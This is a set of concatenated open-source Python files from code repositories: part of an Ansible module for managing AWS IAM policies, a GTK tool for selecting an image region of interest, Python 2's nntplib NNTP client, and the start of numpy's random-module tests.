module.fail_json(msg="Couldn't detach list entities for policy %s: %s" % (policy['PolicyName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for g in entities['PolicyGroups']:
try:
iam.detach_group_policy(PolicyArn=policy['Arn'], GroupName=g['GroupName'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach group policy %s: %s" % (g['GroupName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for u in entities['PolicyUsers']:
try:
iam.detach_user_policy(PolicyArn=policy['Arn'], UserName=u['UserName'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach user policy %s: %s" % (u['UserName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for r in entities['PolicyRoles']:
try:
iam.detach_role_policy(PolicyArn=policy['Arn'], RoleName=r['RoleName'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't detach role policy %s: %s" % (r['RoleName'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
if entities['IsTruncated']:
detach_all_entities(module, iam, policy, marker=entities['Marker'])
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
policy_name=dict(required=True),
policy_description=dict(default=''),
policy=dict(type='json'),
make_default=dict(type='bool', default=True),
only_version=dict(type='bool', default=False),
fail_on_delete=dict(type='bool', default=True),
state=dict(default='present', choices=['present', 'absent']),
))
module = AnsibleModule(
argument_spec=argument_spec,
required_if=[['state', 'present', ['policy']]]
)
if not HAS_BOTO3:
module.fail_json(msg='boto3 is required for this module')
name = module.params.get('policy_name')
description = module.params.get('policy_description')
state = module.params.get('state')
default = module.params.get('make_default')
only = module.params.get('only_version')
policy = None
if module.params.get('policy') is not None:
policy = json.dumps(json.loads(module.params.get('policy')))
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
iam = boto3_conn(module, conn_type='client', resource='iam',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
    except (botocore.exceptions.NoCredentialsError, botocore.exceptions.ProfileNotFound):
        # NoCredentialsError/ProfileNotFound carry no .response attribute,
        # so only the message and traceback are reported here
        module.fail_json(msg="Can't authorize connection. Check your credentials and profile.",
                         exception=traceback.format_exc())
p = get_policy_by_name(module, iam, name)
if state == 'present':
if p is None:
# No Policy so just create one
try:
rvalue = iam.create_policy(PolicyName=name, Path='/',
PolicyDocument=policy, Description=description)
except Exception as e:
module.fail_json(msg="Couldn't create policy %s: %s" % (name, to_native(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
module.exit_json(changed=True, policy=camel_dict_to_snake_dict(rvalue['Policy']))
else:
policy_version, changed = get_or_create_policy_version(module, iam, p, policy)
changed = set_if_default(module, iam, p, policy_version, default) or changed
changed = set_if_only(module, iam, p, policy_version, only) or changed
            # If anything has changed we need to refresh the policy
if changed:
try:
p = iam.get_policy(PolicyArn=p['Arn'])['Policy']
except Exception as e:
module.fail_json(msg="Couldn't get policy: %s" % to_native(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
module.exit_json(changed=changed, policy=camel_dict_to_snake_dict(p))
else:
# Check for existing policy
if p:
# Detach policy
detach_all_entities(module, iam, p)
# Delete Versions
try:
versions = iam.list_policy_versions(PolicyArn=p['Arn'])['Versions']
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % to_native(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for v in versions:
if not v['IsDefaultVersion']:
try:
iam.delete_policy_version(PolicyArn=p['Arn'], VersionId=v['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't delete policy version %s: %s" %
(v['VersionId'], to_native(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# Delete policy
try:
iam.delete_policy(PolicyArn=p['Arn'])
except Exception as e:
module.fail_json(msg="Couldn't delete policy %s: %s" % (p['PolicyName'], to_native(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# This is the one case where we will return the old policy
module.exit_json(changed=True, policy=camel_dict_to_snake_dict(p))
else:
module.exit_json(changed=False, policy=None)
# end main
if __name__ == '__main__':
main()
| mit |
jjberry/Autotrace | matlab-version/SelectROI.py | 3 | 8422 | #!/usr/bin/env python
'''
SelectROI.py
Written by Jeff Berry 18 Feb 2011
Modified by Gus Hahn-Powell 21 Feb 2014
purpose:
This script is designed to help the user select a region of interest
to use with the set of images selected by the user. The boundaries
can be set either by clicking and dragging, or with the text entry
boxes. When this script is run, it will look for a config file called
ROI_config.txt that specifies the region of interest. If no such file
exists, it will be created when the user presses 'Save'. Saving will
overwrite any previous information in ROI_config.txt.
ROI_config.txt will be used by other scripts, such as image_diversity.py,
Autotrace.py, and TrainNetwork.py.
usage:
python SelectROI.py
'''
import cv
import os, sys
import subprocess
import numpy
from numpy import *
import gtk
import gtk.glade
import gnomecanvas
class ImageWindow:
def __init__(self):
self.onOpen()
self.wTree = gtk.glade.XML("roi.glade", "window1")
self.window = self.wTree.get_widget("window1")
sigs = {"on_window1_destroy" : gtk.main_quit,
"on_button1_clicked" : self.onSave,
"on_button2_clicked" : self.onReset,
"on_topentry_activate" : self.resetByText,
"on_bottomentry_activate" : self.resetByText,
"on_leftentry_activate" : self.resetByText,
"on_rightentry_activate" : self.resetByText}
self.wTree.signal_autoconnect(sigs)
self.statusbar = self.wTree.get_widget("statusbar1")
self.machineCBox = self.wTree.get_widget("combobox1")
self.machineCBox.set_active(-1) #initialize as "UNKNOWN"
self.topentry = self.wTree.get_widget("topentry")
self.bottomentry = self.wTree.get_widget("bottomentry")
self.leftentry = self.wTree.get_widget("leftentry")
self.rightentry = self.wTree.get_widget("rightentry")
self.cbox = self.wTree.get_widget("canvashbox")
self.canvas = gnomecanvas.Canvas(aa=True)
#open an image to see the size
img = cv.LoadImageM(self.datafiles[0], iscolor=False)
self.csize = shape(img)
self.canvas.set_size_request(self.csize[1], self.csize[0])
self.canvas.set_scroll_region(0, 0, self.csize[1], self.csize[0])
self.cbox.add(self.canvas)
self.canvas.connect("event", self.canvas_event)
self.DRAG = False
self.pathtofiles = '/'.join(self.datafiles[0].split('/')[:-1]) + '/'
#Read ROI_config.txt if it exists
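        # Expected ROI_config.txt layout (tab-separated pairs, one per line;
        # the numbers match the Sonosite Titan defaults used below, and the
        # machine label is hypothetical):
        #   machine   SonositeTitan
        #   top       140
        #   bottom    320
        #   left      250
        #   right     580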
        self.config = 'ROI_config.txt'
        config_path = os.path.join(self.pathtofiles, self.config)
        if os.path.isfile(config_path):
            c = open(config_path, 'r').readlines()
self.top = int(c[1][:-1].split('\t')[1])
self.bottom = int(c[2][:-1].split('\t')[1])
self.left = int(c[3][:-1].split('\t')[1])
self.right = int(c[4][:-1].split('\t')[1])
else:
self.top = 140 #default settings for the Sonosite Titan
self.bottom = 320
self.left = 250
self.right = 580
self.getSumImage()
pixbuf = gtk.gdk.pixbuf_new_from_file(self.pathtofiles+'SumImage.png')
self.background = self.canvas.root().add(gnomecanvas.CanvasPixbuf, x=0, y=0, pixbuf=pixbuf)
self.reset()
subprocess.Popen(['rm', self.pathtofiles+'SumImage.png'])
self.window.show_all()
def onOpen(self):
fc = gtk.FileChooserDialog(title='Open Image Files', parent=None,
action=gtk.FILE_CHOOSER_ACTION_OPEN,
buttons=(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_OPEN, gtk.RESPONSE_OK))
g_directory = fc.get_current_folder() if fc.get_current_folder() else os.path.expanduser("~")
fc.set_current_folder(g_directory)
fc.set_default_response(gtk.RESPONSE_OK)
fc.set_select_multiple(True)
ffilter = gtk.FileFilter()
ffilter.set_name('Image Files')
ffilter.add_pattern('*.jpg')
ffilter.add_pattern('*.png')
fc.add_filter(ffilter)
response = fc.run()
if response == gtk.RESPONSE_OK:
self.datafiles = fc.get_filenames()
g_directory = fc.get_current_folder() #set this to an attribute?
fc.destroy()
def onSave(self, event):
model = self.machineCBox.get_model()
index = self.machineCBox.get_active()
machine = model[index][0]
fc = gtk.FileChooserDialog(title='Save RoI Config File', parent=None,
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
fc.set_current_name(self.config) #sets a suggested filename
g_directory = fc.get_current_folder() if fc.get_current_folder() else os.path.expanduser("~")
fc.set_current_folder(g_directory)
fc.set_default_response(gtk.RESPONSE_OK)
fc.set_select_multiple(False)
fc.set_do_overwrite_confirmation(True)
response = fc.run()
#exit fc on cancel..
if response == gtk.RESPONSE_CANCEL:
fc.destroy()
#save...
if response == gtk.RESPONSE_OK:
savename = fc.get_filename()
f_path, f_name = os.path.split(savename)
o = open(savename, 'w')
o.write('machine\t%s\n' % machine)
o.write('top\t%s\n' % self.topentry.get_text())
o.write('bottom\t%s\n' % self.bottomentry.get_text())
o.write('left\t%s\n' % self.leftentry.get_text())
o.write('right\t%s\n' % self.rightentry.get_text())
o.close()
dialog = gtk.MessageDialog(parent=None, type=gtk.MESSAGE_INFO,
buttons=gtk.BUTTONS_CLOSE, message_format="{roi_config} saved to {path}".format(roi_config=f_name, path=f_path))
dialog.set_title("Save confirmation")
dialog.add_button("Exit Program", 100) #100 is an arbitrary choice...
response = dialog.run()
#if we want to exit the program...
if response == 100:
dialog.destroy()
fc.destroy()
gtk.main_quit()
#if we just want to exit fc...
else:
dialog.destroy()
fc.destroy()
def onReset(self, event):
self.reset()
def reset(self):
try:
self.rubberband.destroy()
except AttributeError:
pass
self.rubberband = self.get_rect(self.left, self.top)
self.rubberband.set(x2=self.right, y2=self.bottom)
self.topentry.set_text(str(self.top))
self.bottomentry.set_text(str(self.bottom))
self.leftentry.set_text(str(self.left))
self.rightentry.set_text(str(self.right))
def resetByText(self, event):
top = int(self.topentry.get_text())
bottom = int(self.bottomentry.get_text())
left = int(self.leftentry.get_text())
right = int(self.rightentry.get_text())
try:
self.rubberband.destroy()
except AttributeError:
pass
self.rubberband = self.get_rect(left, top)
self.rubberband.set(x2=right, y2=bottom)
def canvas_event(self, widget, event):
if (event.type == gtk.gdk.MOTION_NOTIFY):
context_id = self.statusbar.get_context_id("mouse motion")
text = "({x},{y})".format(x=int(event.x), y=int(event.y))
self.statusbar.push(context_id, text)
if (self.DRAG):
self.rubberband.set(x2=event.x, y2=event.y)
if (event.type == gtk.gdk.BUTTON_PRESS):
if (event.button == 1):
self.rubberband.destroy()
self.DRAG = True
self.startx = event.x
self.starty = event.y
self.rubberband = self.get_rect(self.startx, self.starty)
# sends selection data to the relevant method
if (event.type == gtk.gdk.BUTTON_RELEASE) and (self.DRAG):
if (event.button == 1):
self.DRAG = False
self.endx = event.x
self.endy = event.y
self.rubberband.set(x2=self.endx, y2=self.endy)
if (self.starty <= self.endy):
self.topentry.set_text(str(int(self.starty)))
self.bottomentry.set_text(str(int(self.endy)))
else:
self.topentry.set_text(str(int(self.endy)))
self.bottomentry.set_text(str(int(self.starty)))
if (self.startx <= self.endx):
self.leftentry.set_text(str(int(self.startx)))
self.rightentry.set_text(str(int(self.endx)))
else:
self.leftentry.set_text(str(int(self.endx)))
self.rightentry.set_text(str(int(self.startx)))
def get_rect(self, x, y):
itemType = gnomecanvas.CanvasRect
rect = self.canvas.root().add(itemType, x1=x, y1=y, x2=x, y2=y, #0x0 dimensions at first
fill_color_rgba=0xFFFF0000, outline_color_rgba=0xFFFF0055, width_units=1.0)
return rect
def getSumImage(self):
sum_img = zeros(self.csize)
for i in self.datafiles:
img = cv.LoadImageM(i, iscolor=False)
tmp = zeros(self.csize)
tmp += img
sum_img += tmp
#sum_img = (sum_img * 255)/(numpy.max(sum_img))
sum_img = sum_img/len(self.datafiles)
cv.SaveImage(self.pathtofiles+'SumImage.png', cv.fromarray(sum_img))
self.sum_img = sum_img
if __name__ == "__main__":
ImageWindow()
gtk.main()
| mit |
makermade/arm_android-19_arm-linux-androideabi-4.8 | lib/python2.7/nntplib.py | 157 | 21135 | """An NNTP client class based on RFC 977: Network News Transfer Protocol.
Example:
>>> from nntplib import NNTP
>>> s = NNTP('news')
>>> resp, count, first, last, name = s.group('comp.lang.python')
>>> print 'Group', name, 'has', count, 'articles, range', first, 'to', last
Group comp.lang.python has 51 articles, range 5770 to 5821
>>> resp, subs = s.xhdr('subject', first + '-' + last)
>>> resp = s.quit()
>>>
Here 'resp' is the server response line.
Error responses are turned into exceptions.
To post an article from a file:
>>> f = open(filename, 'r') # file containing article, including header
>>> resp = s.post(f)
>>>
For descriptions of all methods, read the comments in the code below.
Note that all arguments and return values representing article numbers
are strings, not numbers, since they are rarely used for calculations.
"""
# RFC 977 by Brian Kantor and Phil Lapsley.
# xover, xgtitle, xpath, date methods by Kevan Heydon
# Imports
import re
import socket
__all__ = ["NNTP","NNTPReplyError","NNTPTemporaryError",
"NNTPPermanentError","NNTPProtocolError","NNTPDataError",
"error_reply","error_temp","error_perm","error_proto",
"error_data",]
# Exceptions raised when an error or invalid response is received
class NNTPError(Exception):
"""Base class for all nntplib exceptions"""
def __init__(self, *args):
Exception.__init__(self, *args)
try:
self.response = args[0]
except IndexError:
self.response = 'No response given'
class NNTPReplyError(NNTPError):
"""Unexpected [123]xx reply"""
pass
class NNTPTemporaryError(NNTPError):
"""4xx errors"""
pass
class NNTPPermanentError(NNTPError):
"""5xx errors"""
pass
class NNTPProtocolError(NNTPError):
"""Response does not begin with [1-5]"""
pass
class NNTPDataError(NNTPError):
"""Error in response data"""
pass
# for backwards compatibility
error_reply = NNTPReplyError
error_temp = NNTPTemporaryError
error_perm = NNTPPermanentError
error_proto = NNTPProtocolError
error_data = NNTPDataError
# Standard port used by NNTP servers
NNTP_PORT = 119
# Response numbers that are followed by additional text (e.g. article)
LONGRESP = ['100', '215', '220', '221', '222', '224', '230', '231', '282']
# Line terminators (we always output CRLF, but accept any of CRLF, CR, LF)
CRLF = '\r\n'
# The class itself
class NNTP:
def __init__(self, host, port=NNTP_PORT, user=None, password=None,
readermode=None, usenetrc=True):
"""Initialize an instance. Arguments:
- host: hostname to connect to
- port: port to connect to (default the standard NNTP port)
- user: username to authenticate with
- password: password to use with username
- readermode: if true, send 'mode reader' command after
connecting.
readermode is sometimes necessary if you are connecting to an
NNTP server on the local machine and intend to call
reader-specific commands, such as `group'. If you get
unexpected NNTPPermanentErrors, you might need to set
readermode.
"""
self.host = host
self.port = port
self.sock = socket.create_connection((host, port))
self.file = self.sock.makefile('rb')
self.debugging = 0
self.welcome = self.getresp()
# 'mode reader' is sometimes necessary to enable 'reader' mode.
# However, the order in which 'mode reader' and 'authinfo' need to
# arrive differs between some NNTP servers. Try to send
# 'mode reader', and if it fails with an authorization failed
# error, try again after sending authinfo.
readermode_afterauth = 0
if readermode:
try:
self.welcome = self.shortcmd('mode reader')
except NNTPPermanentError:
# error 500, probably 'not implemented'
pass
except NNTPTemporaryError, e:
if user and e.response[:3] == '480':
# Need authorization before 'mode reader'
readermode_afterauth = 1
else:
raise
# If no login/password was specified, try to get them from ~/.netrc
        # Presume that if .netrc has an entry, NNRP authentication is required.
try:
if usenetrc and not user:
import netrc
credentials = netrc.netrc()
auth = credentials.authenticators(host)
if auth:
user = auth[0]
password = auth[2]
except IOError:
pass
# Perform NNRP authentication if needed.
if user:
resp = self.shortcmd('authinfo user '+user)
if resp[:3] == '381':
if not password:
raise NNTPReplyError(resp)
else:
resp = self.shortcmd(
'authinfo pass '+password)
if resp[:3] != '281':
raise NNTPPermanentError(resp)
if readermode_afterauth:
try:
self.welcome = self.shortcmd('mode reader')
except NNTPPermanentError:
# error 500, probably 'not implemented'
pass
# Get the welcome message from the server
# (this is read and squirreled away by __init__()).
# If the response code is 200, posting is allowed;
    # if it is 201, posting is not allowed
def getwelcome(self):
"""Get the welcome message from the server
(this is read and squirreled away by __init__()).
If the response code is 200, posting is allowed;
        if it is 201, posting is not allowed."""
if self.debugging: print '*welcome*', repr(self.welcome)
return self.welcome
def set_debuglevel(self, level):
"""Set the debugging level. Argument 'level' means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
2: also print raw lines read and sent before stripping CR/LF"""
self.debugging = level
debug = set_debuglevel
def putline(self, line):
"""Internal: send one line to the server, appending CRLF."""
line = line + CRLF
if self.debugging > 1: print '*put*', repr(line)
self.sock.sendall(line)
def putcmd(self, line):
"""Internal: send one command to the server (through putline())."""
if self.debugging: print '*cmd*', repr(line)
self.putline(line)
def getline(self):
"""Internal: return one line from the server, stripping CRLF.
Raise EOFError if the connection is closed."""
line = self.file.readline()
if self.debugging > 1:
print '*get*', repr(line)
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
def getresp(self):
"""Internal: get a response from the server.
Raise various errors if the response indicates an error."""
resp = self.getline()
if self.debugging: print '*resp*', repr(resp)
c = resp[:1]
if c == '4':
raise NNTPTemporaryError(resp)
if c == '5':
raise NNTPPermanentError(resp)
if c not in '123':
raise NNTPProtocolError(resp)
return resp
def getlongresp(self, file=None):
"""Internal: get a response plus following text from the server.
Raise various errors if the response indicates an error."""
openedFile = None
try:
# If a string was passed then open a file with that name
if isinstance(file, str):
openedFile = file = open(file, "w")
resp = self.getresp()
if resp[:3] not in LONGRESP:
raise NNTPReplyError(resp)
list = []
while 1:
line = self.getline()
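                # A lone '.' terminates the multi-line response; a leading
                # '..' is RFC 977 dot-stuffing and is collapsed back to '.'.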
if line == '.':
break
if line[:2] == '..':
line = line[1:]
if file:
file.write(line + "\n")
else:
list.append(line)
finally:
# If this method created the file, then it must close it
if openedFile:
openedFile.close()
return resp, list
def shortcmd(self, line):
"""Internal: send a command and get the response."""
self.putcmd(line)
return self.getresp()
def longcmd(self, line, file=None):
"""Internal: send a command and get the response plus following text."""
self.putcmd(line)
return self.getlongresp(file)
def newgroups(self, date, time, file=None):
"""Process a NEWGROUPS command. Arguments:
- date: string 'yymmdd' indicating the date
- time: string 'hhmmss' indicating the time
Return:
- resp: server response if successful
- list: list of newsgroup names"""
return self.longcmd('NEWGROUPS ' + date + ' ' + time, file)
def newnews(self, group, date, time, file=None):
"""Process a NEWNEWS command. Arguments:
- group: group name or '*'
- date: string 'yymmdd' indicating the date
- time: string 'hhmmss' indicating the time
Return:
- resp: server response if successful
- list: list of message ids"""
cmd = 'NEWNEWS ' + group + ' ' + date + ' ' + time
return self.longcmd(cmd, file)
def list(self, file=None):
"""Process a LIST command. Return:
- resp: server response if successful
- list: list of (group, last, first, flag) (strings)"""
resp, list = self.longcmd('LIST', file)
for i in range(len(list)):
# Parse lines into "group last first flag"
list[i] = tuple(list[i].split())
return resp, list
def description(self, group):
"""Get a description for a single group. If more than one
group matches ('group' is a pattern), return the first. If no
group matches, return an empty string.
This elides the response code from the server, since it can
only be '215' or '285' (for xgtitle) anyway. If the response
code is needed, use the 'descriptions' method.
NOTE: This neither checks for a wildcard in 'group' nor does
it check whether the group actually exists."""
resp, lines = self.descriptions(group)
if len(lines) == 0:
return ""
else:
return lines[0][1]
def descriptions(self, group_pattern):
"""Get descriptions for a range of groups."""
line_pat = re.compile("^(?P<group>[^ \t]+)[ \t]+(.*)$")
# Try the more std (acc. to RFC2980) LIST NEWSGROUPS first
resp, raw_lines = self.longcmd('LIST NEWSGROUPS ' + group_pattern)
if resp[:3] != "215":
# Now the deprecated XGTITLE. This either raises an error
# or succeeds with the same output structure as LIST
# NEWSGROUPS.
resp, raw_lines = self.longcmd('XGTITLE ' + group_pattern)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def group(self, name):
"""Process a GROUP command. Argument:
- group: the group name
Returns:
- resp: server response if successful
- count: number of articles (string)
- first: first article number (string)
- last: last article number (string)
- name: the group name"""
resp = self.shortcmd('GROUP ' + name)
if resp[:3] != '211':
raise NNTPReplyError(resp)
words = resp.split()
count = first = last = 0
n = len(words)
if n > 1:
count = words[1]
if n > 2:
first = words[2]
if n > 3:
last = words[3]
if n > 4:
name = words[4].lower()
return resp, count, first, last, name
def help(self, file=None):
"""Process a HELP command. Returns:
- resp: server response if successful
- list: list of strings"""
return self.longcmd('HELP',file)
def statparse(self, resp):
"""Internal: parse the response of a STAT, NEXT or LAST command."""
if resp[:2] != '22':
raise NNTPReplyError(resp)
words = resp.split()
nr = 0
id = ''
n = len(words)
if n > 1:
nr = words[1]
if n > 2:
id = words[2]
return resp, nr, id
def statcmd(self, line):
"""Internal: process a STAT, NEXT or LAST command."""
resp = self.shortcmd(line)
return self.statparse(resp)
def stat(self, id):
"""Process a STAT command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: the article number
- id: the message id"""
return self.statcmd('STAT ' + id)
def next(self):
"""Process a NEXT command. No arguments. Return as for STAT."""
return self.statcmd('NEXT')
def last(self):
"""Process a LAST command. No arguments. Return as for STAT."""
return self.statcmd('LAST')
def artcmd(self, line, file=None):
"""Internal: process a HEAD, BODY or ARTICLE command."""
resp, list = self.longcmd(line, file)
resp, nr, id = self.statparse(resp)
return resp, nr, id, list
def head(self, id):
"""Process a HEAD command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article's header"""
return self.artcmd('HEAD ' + id)
def body(self, id, file=None):
"""Process a BODY command. Argument:
- id: article number or message id
- file: Filename string or file object to store the article in
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article's body or an empty list
if file was used"""
return self.artcmd('BODY ' + id, file)
def article(self, id):
"""Process an ARTICLE command. Argument:
- id: article number or message id
Returns:
- resp: server response if successful
- nr: article number
- id: message id
- list: the lines of the article"""
return self.artcmd('ARTICLE ' + id)
def slave(self):
"""Process a SLAVE command. Returns:
- resp: server response if successful"""
return self.shortcmd('SLAVE')
def xhdr(self, hdr, str, file=None):
"""Process an XHDR command (optional server extension). Arguments:
- hdr: the header type (e.g. 'subject')
- str: an article nr, a message id, or a range nr1-nr2
Returns:
- resp: server response if successful
- list: list of (nr, value) strings"""
pat = re.compile('^([0-9]+) ?(.*)\n?')
resp, lines = self.longcmd('XHDR ' + hdr + ' ' + str, file)
for i in range(len(lines)):
line = lines[i]
m = pat.match(line)
if m:
lines[i] = m.group(1, 2)
return resp, lines
def xover(self, start, end, file=None):
"""Process an XOVER command (optional server extension) Arguments:
- start: start of range
- end: end of range
Returns:
- resp: server response if successful
- list: list of (art-nr, subject, poster, date,
id, references, size, lines)"""
resp, lines = self.longcmd('XOVER ' + start + '-' + end, file)
xover_lines = []
for line in lines:
elem = line.split("\t")
try:
xover_lines.append((elem[0],
elem[1],
elem[2],
elem[3],
elem[4],
elem[5].split(),
elem[6],
elem[7]))
except IndexError:
raise NNTPDataError(line)
        return resp, xover_lines
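    # Illustrative use of xover() (the article numbers are hypothetical):
    #   resp, overviews = s.xover('3000234', '3000240')
    #   for (art_nr, subject, poster, date, msg_id,
    #        refs, size, line_count) in overviews:
    #       ...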
def xgtitle(self, group, file=None):
"""Process an XGTITLE command (optional server extension) Arguments:
- group: group name wildcard (i.e. news.*)
Returns:
- resp: server response if successful
- list: list of (name,title) strings"""
line_pat = re.compile("^([^ \t]+)[ \t]+(.*)$")
resp, raw_lines = self.longcmd('XGTITLE ' + group, file)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def xpath(self,id):
"""Process an XPATH command (optional server extension) Arguments:
- id: Message id of article
Returns:
resp: server response if successful
path: directory path to article"""
resp = self.shortcmd("XPATH " + id)
if resp[:3] != '223':
raise NNTPReplyError(resp)
try:
[resp_num, path] = resp.split()
except ValueError:
raise NNTPReplyError(resp)
else:
return resp, path
    def date(self):
"""Process the DATE command. Arguments:
None
Returns:
resp: server response if successful
date: Date suitable for newnews/newgroups commands etc.
time: Time suitable for newnews/newgroups commands etc."""
resp = self.shortcmd("DATE")
if resp[:3] != '111':
raise NNTPReplyError(resp)
elem = resp.split()
if len(elem) != 2:
raise NNTPDataError(resp)
date = elem[1][2:8]
time = elem[1][-6:]
if len(date) != 6 or len(time) != 6:
raise NNTPDataError(resp)
return resp, date, time
def post(self, f):
"""Process a POST command. Arguments:
- f: file containing the article
Returns:
- resp: server response if successful"""
resp = self.shortcmd('POST')
# Raises error_??? if posting is not allowed
if resp[0] != '3':
raise NNTPReplyError(resp)
while 1:
line = f.readline()
if not line:
break
if line[-1] == '\n':
line = line[:-1]
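            # Lines beginning with '.' must be dot-stuffed ('.' -> '..');
            # the lone '.' sent after the loop terminates the article (RFC 977).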
if line[:1] == '.':
line = '.' + line
self.putline(line)
self.putline('.')
return self.getresp()
def ihave(self, id, f):
"""Process an IHAVE command. Arguments:
- id: message-id of the article
- f: file containing the article
Returns:
- resp: server response if successful
Note that if the server refuses the article an exception is raised."""
resp = self.shortcmd('IHAVE ' + id)
# Raises error_??? if the server already has it
if resp[0] != '3':
raise NNTPReplyError(resp)
while 1:
line = f.readline()
if not line:
break
if line[-1] == '\n':
line = line[:-1]
if line[:1] == '.':
line = '.' + line
self.putline(line)
self.putline('.')
return self.getresp()
def quit(self):
"""Process a QUIT command and close the socket. Returns:
- resp: server response if successful"""
resp = self.shortcmd('QUIT')
self.file.close()
self.sock.close()
del self.file, self.sock
return resp
# Test retrieval when run as a script.
# Assumption: if there's a local news server, it's called 'news'.
# Assumption: if user queries a remote news server, it's named
# in the environment variable NNTPSERVER (used by slrn and kin)
# and we want readermode off.
if __name__ == '__main__':
import os
    newshost = os.environ.get("NNTPSERVER", "news")
if newshost.find('.') == -1:
mode = 'readermode'
else:
mode = None
s = NNTP(newshost, readermode=mode)
resp, count, first, last, name = s.group('comp.lang.python')
print resp
print 'Group', name, 'has', count, 'articles, range', first, 'to', last
resp, subs = s.xhdr('subject', first + '-' + last)
print resp
for item in subs:
print "%7s %s" % item
resp = s.quit()
print resp
| gpl-2.0 |
jonyroda97/redbot-amigosprovaveis | lib/numpy/random/tests/test_random.py | 12 | 64445 | from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy import random
import sys
class TestSeed(TestCase):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(TestCase):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
np.float(1))
class TestSetState(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
